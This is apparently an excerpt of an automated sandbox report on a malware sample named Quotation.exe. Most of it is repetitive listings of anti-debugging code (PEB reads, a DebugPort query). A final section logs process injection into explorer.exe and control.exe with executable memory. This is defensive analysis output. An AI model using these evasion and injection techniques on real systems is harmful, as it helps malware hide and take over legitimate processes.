        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353510D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF13E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BA130 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33567128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33567128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335291F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335291F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335391E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335391E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335281EB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33559194 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336051B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335631BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335631BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560044 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537072 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33536074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33536074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360505B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335D9060 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572010 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33555004 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33555004 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33538009 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D02D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354B0D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C0F6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356D0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356D0F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A093 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C090 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336050B7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EB0AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335700A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DE750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33563740 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356174A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560774 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33542760 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF717 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353D700 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33559723 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF7CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335377F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335377F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E7E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33561796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33561796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336017BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335307A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33565654 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33533640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33530670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF607 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356360F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33530630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33535622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33535622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D6D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335306CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FA6C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335D86C2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353C6E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33538690 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BC691 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF68C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\Quotation.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: 5D0000
        Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
